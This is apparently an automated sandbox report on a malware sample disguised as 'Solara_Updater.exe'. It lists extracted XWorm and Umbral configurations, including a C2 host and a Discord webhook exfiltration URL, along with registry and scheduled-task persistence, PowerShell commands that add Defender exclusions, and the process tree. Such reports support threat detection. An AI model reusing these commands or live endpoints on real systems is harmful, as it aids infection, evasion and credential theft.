Analysis
-
max time kernel
150s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
19-05-2024 16:14
Static task
static1
Behavioral task
behavioral1
Sample
Solara_Updater.exe
Resource
win7-20240419-en
General
-
Target
Solara_Updater.exe
-
Size
1.9MB
-
MD5
f4cffd7e6cca2b88bba1f19120e9255f
-
SHA1
28df62794d325206d1f61a400b5c5c682632e371
-
SHA256
4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
-
SHA512
cb71ef2db087c012744fcac05033cab80947131029ae9bf59b57f85dd2f819e859f105919978a2af4334ac4b8f5b060f5f757b6898cb8fddd720a114b652bfe8
-
SSDEEP
49152:mH4Y2d/Pz0dB5h1qeU2V0ZBsvH1jBOtGQt/3c5DGqHQX+icSr:mH/QPz0d/pV0AvHLDh5HH4+i
Malware Config
Extracted
xworm
answer-riverside.gl.at.ply.gg:45691
-
Install_directory
%AppData%
-
install_file
svhost.exe
Extracted
umbral
https://discordapp.com/api/webhooks/1239665745831530598/iJT0OELt4O4igXW_VMu-CUIfcqaawXLhyC4Bruuv1t2x0XOvC0_p9dc-G_RxJMO7fn-V
Signatures
-
Detect Umbral payload 4 IoCs
resource yara_rule behavioral1/files/0x000a000000013b02-46.dat family_umbral behavioral1/memory/1992-50-0x0000000001270000-0x00000000012B0000-memory.dmp family_umbral behavioral1/memory/680-295-0x0000000000890000-0x00000000008D0000-memory.dmp family_umbral behavioral1/memory/2556-391-0x0000000000300000-0x0000000000340000-memory.dmp family_umbral -
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral1/files/0x000d000000013abd-43.dat family_xworm behavioral1/memory/1808-49-0x0000000000E30000-0x0000000000E46000-memory.dmp family_xworm behavioral1/memory/1296-221-0x0000000000380000-0x0000000000396000-memory.dmp family_xworm behavioral1/memory/300-431-0x0000000000C90000-0x0000000000CA6000-memory.dmp family_xworm behavioral1/memory/2068-545-0x0000000000CB0000-0x0000000000CC6000-memory.dmp family_xworm -
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\smss.exe\", \"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\", \"C:\\Program Files (x86)\\Google\\cmd.exe\", \"C:\\hostNet\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\taskeng.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\smss.exe\", \"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\", \"C:\\Program Files (x86)\\Google\\cmd.exe\", \"C:\\hostNet\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\taskeng.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\smss.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\smss.exe\", \"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\smss.exe\", \"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\", \"C:\\Program Files (x86)\\Google\\cmd.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\smss.exe\", \"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\", \"C:\\Program Files (x86)\\Google\\cmd.exe\", \"C:\\hostNet\\conhost.exe\"" bridgeblockportComBroker.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2700 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3004 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2752 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2892 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2912 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2084 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1848 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1796 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2688 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1100 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2468 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3024 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1628 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1532 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1668 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2392 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1072 2784 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 908 2784 schtasks.exe 32 -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2660 powershell.exe 836 powershell.exe 2588 powershell.exe 2032 powershell.exe 2356 powershell.exe 1888 powershell.exe 1740 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk XClient.exe -
Executes dropped EXE 64 IoCs
pid Process 3012 Loader.exe 2000 sol.exe 2696 Loader.exe 2556 sol.exe 2756 Loader.exe 2804 sol.exe 1808 XClient.exe 1992 RustCheat.exe 2328 Loader.exe 1832 sol.exe 468 sol.exe 2308 Loader.exe 2952 XClient.exe 1488 RustCheat.exe 2152 Loader.exe 1844 sol.exe 2124 Loader.exe 2228 sol.exe 1556 XClient.exe 1996 RustCheat.exe 2624 Loader.exe 2488 sol.exe 1220 Loader.exe 2376 sol.exe 2756 Loader.exe 2420 sol.exe 2512 Loader.exe 2536 sol.exe 2492 Loader.exe 1356 sol.exe 1296 svhost.exe 2676 bridgeblockportComBroker.exe 2328 Loader.exe 1460 sol.exe 2588 bridgeblockportComBroker.exe 876 Loader.exe 1844 sol.exe 1220 bridgeblockportComBroker.exe 1976 Loader.exe 2032 sol.exe 1848 bridgeblockportComBroker.exe 1600 Loader.exe 1784 sol.exe 2192 bridgeblockportComBroker.exe 2560 Loader.exe 688 sol.exe 2244 bridgeblockportComBroker.exe 1576 Loader.exe 2052 sol.exe 2376 bridgeblockportComBroker.exe 1720 Loader.exe 1884 sol.exe 664 XClient.exe 680 RustCheat.exe 2076 taskeng.exe 2392 bridgeblockportComBroker.exe 860 Loader.exe 2360 sol.exe 1508 bridgeblockportComBroker.exe 2584 Loader.exe 2356 sol.exe 2252 bridgeblockportComBroker.exe 3028 Loader.exe 1948 sol.exe -
Loads dropped DLL 58 IoCs
pid Process 2628 cmd.exe 2628 cmd.exe 1288 cmd.exe 1744 cmd.exe 1560 cmd.exe 2916 cmd.exe 848 cmd.exe 1452 cmd.exe 2288 cmd.exe 1960 cmd.exe 1476 cmd.exe 2748 cmd.exe 756 cmd.exe 2272 cmd.exe 1848 cmd.exe 2832 cmd.exe 1412 cmd.exe 2124 cmd.exe 2088 cmd.exe 2568 cmd.exe 980 cmd.exe 2372 cmd.exe 2024 cmd.exe 2748 cmd.exe 2912 cmd.exe 532 cmd.exe 1476 cmd.exe 944 cmd.exe 1760 cmd.exe 2324 cmd.exe 1464 cmd.exe 1604 cmd.exe 1764 cmd.exe 2328 cmd.exe 2224 cmd.exe 2188 cmd.exe 2164 cmd.exe 2084 cmd.exe 1256 cmd.exe 2160 cmd.exe 1460 cmd.exe 2296 cmd.exe 2952 cmd.exe 924 cmd.exe 2776 cmd.exe 2912 cmd.exe 1328 cmd.exe 2864 cmd.exe 1352 cmd.exe 2928 cmd.exe 2576 cmd.exe 2648 cmd.exe 2444 cmd.exe 2456 cmd.exe 792 cmd.exe 1876 cmd.exe 2816 cmd.exe 1960 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" XClient.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\taskeng.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\hostNet\\conhost.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\taskeng.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\Program Files\\Windows Media Player\\de-DE\\taskeng.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Google\\cmd.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\hostNet\\conhost.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\hostNet\\smss.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\hostNet\\smss.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Google\\cmd.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe -
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 ip-api.com 66 ip-api.com 4 ip-api.com 14 ip-api.com 32 ipinfo.io 33 ipinfo.io 40 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSCF6C8047328354985AF527578961D7E65.TMP csc.exe File created \??\c:\Windows\System32\wx6deg.exe csc.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Windows Media Player\de-DE\taskeng.exe bridgeblockportComBroker.exe File created C:\Program Files\Windows Media Player\de-DE\96094160f8fe35 bridgeblockportComBroker.exe File created C:\Program Files (x86)\Google\cmd.exe bridgeblockportComBroker.exe File created C:\Program Files (x86)\Google\ebf1f9fa8afd6d bridgeblockportComBroker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3004 schtasks.exe 2892 schtasks.exe 2688 schtasks.exe 1072 schtasks.exe 2076 schtasks.exe 2700 schtasks.exe 2912 schtasks.exe 3024 schtasks.exe 1628 schtasks.exe 1532 schtasks.exe 1668 schtasks.exe 2752 schtasks.exe 2084 schtasks.exe 1848 schtasks.exe 1796 schtasks.exe 1100 schtasks.exe 2468 schtasks.exe 2392 schtasks.exe 908 schtasks.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2900 wmic.exe 2608 wmic.exe 1420 wmic.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 bridgeblockportComBroker.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 bridgeblockportComBroker.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 2324 PING.EXE 1452 PING.EXE 2608 PING.EXE 1228 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1992 RustCheat.exe 836 powershell.exe 1776 powershell.exe 1796 powershell.exe 2608 powershell.exe 2588 powershell.exe 2712 powershell.exe 2032 powershell.exe 2356 powershell.exe 1888 powershell.exe 1996 RustCheat.exe 1740 powershell.exe 2528 powershell.exe 1232 powershell.exe 1508 powershell.exe 2968 powershell.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe 2676 bridgeblockportComBroker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3012 Loader.exe Token: SeDebugPrivilege 1808 XClient.exe Token: SeDebugPrivilege 1992 RustCheat.exe Token: SeDebugPrivilege 2756 Loader.exe Token: SeIncreaseQuotaPrivilege 1076 wmic.exe Token: SeSecurityPrivilege 1076 wmic.exe Token: SeTakeOwnershipPrivilege 1076 wmic.exe Token: SeLoadDriverPrivilege 1076 wmic.exe Token: SeSystemProfilePrivilege 1076 wmic.exe Token: SeSystemtimePrivilege 1076 wmic.exe Token: SeProfSingleProcessPrivilege 1076 wmic.exe Token: SeIncBasePriorityPrivilege 1076 wmic.exe Token: SeCreatePagefilePrivilege 1076 wmic.exe Token: SeBackupPrivilege 1076 wmic.exe Token: SeRestorePrivilege 1076 wmic.exe Token: SeShutdownPrivilege 1076 wmic.exe Token: SeDebugPrivilege 1076 wmic.exe Token: SeSystemEnvironmentPrivilege 1076 wmic.exe Token: SeRemoteShutdownPrivilege 1076 wmic.exe Token: SeUndockPrivilege 1076 wmic.exe Token: SeManageVolumePrivilege 1076 wmic.exe Token: 33 1076 wmic.exe Token: 34 1076 wmic.exe Token: 35 1076 wmic.exe Token: SeIncreaseQuotaPrivilege 1076 wmic.exe Token: SeSecurityPrivilege 1076 wmic.exe Token: SeTakeOwnershipPrivilege 1076 wmic.exe Token: SeLoadDriverPrivilege 1076 wmic.exe Token: SeSystemProfilePrivilege 1076 wmic.exe Token: SeSystemtimePrivilege 1076 wmic.exe Token: SeProfSingleProcessPrivilege 1076 wmic.exe Token: SeIncBasePriorityPrivilege 1076 wmic.exe Token: SeCreatePagefilePrivilege 1076 wmic.exe Token: SeBackupPrivilege 1076 wmic.exe Token: SeRestorePrivilege 1076 wmic.exe Token: SeShutdownPrivilege 1076 wmic.exe Token: SeDebugPrivilege 1076 wmic.exe Token: SeSystemEnvironmentPrivilege 1076 wmic.exe Token: SeRemoteShutdownPrivilege 1076 wmic.exe Token: SeUndockPrivilege 1076 wmic.exe Token: SeManageVolumePrivilege 1076 wmic.exe Token: 33 1076 wmic.exe Token: 34 1076 wmic.exe Token: 35 1076 wmic.exe Token: SeDebugPrivilege 836 powershell.exe Token: SeDebugPrivilege 1776 powershell.exe Token: SeDebugPrivilege 2952 XClient.exe Token: SeDebugPrivilege 1796 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeIncreaseQuotaPrivilege 2628 wmic.exe Token: SeSecurityPrivilege 2628 wmic.exe Token: SeTakeOwnershipPrivilege 2628 wmic.exe Token: SeLoadDriverPrivilege 2628 wmic.exe Token: SeSystemProfilePrivilege 2628 wmic.exe Token: SeSystemtimePrivilege 2628 wmic.exe Token: SeProfSingleProcessPrivilege 2628 wmic.exe Token: SeIncBasePriorityPrivilege 2628 wmic.exe Token: SeCreatePagefilePrivilege 2628 wmic.exe Token: SeBackupPrivilege 2628 wmic.exe Token: SeRestorePrivilege 2628 wmic.exe Token: SeShutdownPrivilege 2628 wmic.exe Token: SeDebugPrivilege 2628 wmic.exe Token: SeSystemEnvironmentPrivilege 2628 wmic.exe Token: SeRemoteShutdownPrivilege 2628 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2188 wrote to memory of 3012 2188 Solara_Updater.exe 28 PID 2188 wrote to memory of 3012 2188 Solara_Updater.exe 28 PID 2188 wrote to memory of 3012 2188 Solara_Updater.exe 28 PID 2188 wrote to memory of 2000 2188 Solara_Updater.exe 29 PID 2188 wrote to memory of 2000 2188 Solara_Updater.exe 29 PID 2188 wrote to memory of 2000 2188 Solara_Updater.exe 29 PID 2188 wrote to memory of 2000 2188 Solara_Updater.exe 29 PID 2188 wrote to memory of 2432 2188 Solara_Updater.exe 30 PID 2188 wrote to memory of 2432 2188 Solara_Updater.exe 30 PID 2188 wrote to memory of 2432 2188 Solara_Updater.exe 30 PID 2000 wrote to memory of 2604 2000 sol.exe 31 PID 2000 wrote to memory of 2604 2000 sol.exe 31 PID 2000 wrote to memory of 2604 2000 sol.exe 31 PID 2000 wrote to memory of 2604 2000 sol.exe 31 PID 2432 wrote to memory of 2696 2432 Solara_Updater.exe 33 PID 2432 wrote to memory of 2696 2432 Solara_Updater.exe 33 PID 2432 wrote to memory of 2696 2432 Solara_Updater.exe 33 PID 2432 wrote to memory of 2556 2432 Solara_Updater.exe 34 PID 2432 wrote to memory of 2556 2432 Solara_Updater.exe 34 PID 2432 wrote to memory of 2556 2432 Solara_Updater.exe 34 PID 2432 wrote to memory of 2556 2432 Solara_Updater.exe 34 PID 2432 wrote to memory of 2904 2432 Solara_Updater.exe 35 PID 2432 wrote to memory of 2904 2432 Solara_Updater.exe 35 PID 2432 wrote to memory of 2904 2432 Solara_Updater.exe 35 PID 2556 wrote to memory of 760 2556 sol.exe 36 PID 2556 wrote to memory of 760 2556 sol.exe 36 PID 2556 wrote to memory of 760 2556 sol.exe 36 PID 2556 wrote to memory of 760 2556 sol.exe 36 PID 2904 wrote to memory of 2756 2904 Solara_Updater.exe 37 PID 2904 wrote to memory of 2756 2904 Solara_Updater.exe 37 PID 2904 wrote to memory of 2756 2904 Solara_Updater.exe 37 PID 2904 wrote to memory of 2804 2904 Solara_Updater.exe 38 PID 2904 wrote to memory of 2804 2904 Solara_Updater.exe 38 PID 2904 wrote to memory of 2804 2904 Solara_Updater.exe 38 PID 2904 wrote to memory of 2804 2904 Solara_Updater.exe 38 PID 2904 wrote to memory of 1256 2904 Solara_Updater.exe 39 PID 2904 wrote to memory of 1256 2904 Solara_Updater.exe 39 PID 2904 wrote to memory of 1256 2904 Solara_Updater.exe 39 PID 2804 wrote to memory of 2412 2804 sol.exe 40 PID 2804 wrote to memory of 2412 2804 sol.exe 40 PID 2804 wrote to memory of 2412 2804 sol.exe 40 PID 2804 wrote to memory of 2412 2804 sol.exe 40 PID 3012 wrote to memory of 1808 3012 Loader.exe 41 PID 3012 wrote to memory of 1808 3012 Loader.exe 41 PID 3012 wrote to memory of 1808 3012 Loader.exe 41 PID 3012 wrote to memory of 1992 3012 Loader.exe 42 PID 3012 wrote to memory of 1992 3012 Loader.exe 42 PID 3012 wrote to memory of 1992 3012 Loader.exe 42 PID 1256 wrote to memory of 2328 1256 Solara_Updater.exe 43 PID 1256 wrote to memory of 2328 1256 Solara_Updater.exe 43 PID 1256 wrote to memory of 2328 1256 Solara_Updater.exe 43 PID 1256 wrote to memory of 1832 1256 Solara_Updater.exe 44 PID 1256 wrote to memory of 1832 1256 Solara_Updater.exe 44 PID 1256 wrote to memory of 1832 1256 Solara_Updater.exe 44 PID 1256 wrote to memory of 1832 1256 Solara_Updater.exe 44 PID 1256 wrote to memory of 1984 1256 Solara_Updater.exe 45 PID 1256 wrote to memory of 1984 1256 Solara_Updater.exe 45 PID 1256 wrote to memory of 1984 1256 Solara_Updater.exe 45 PID 1832 wrote to memory of 1216 1832 sol.exe 46 PID 1832 wrote to memory of 1216 1832 sol.exe 46 PID 1832 wrote to memory of 1216 1832 sol.exe 46 PID 1832 wrote to memory of 1216 1832 sol.exe 46 PID 1992 wrote to memory of 1076 1992 RustCheat.exe 47 PID 1992 wrote to memory of 1076 1992 RustCheat.exe 47 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 2632 attrib.exe 976 attrib.exe 1500 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
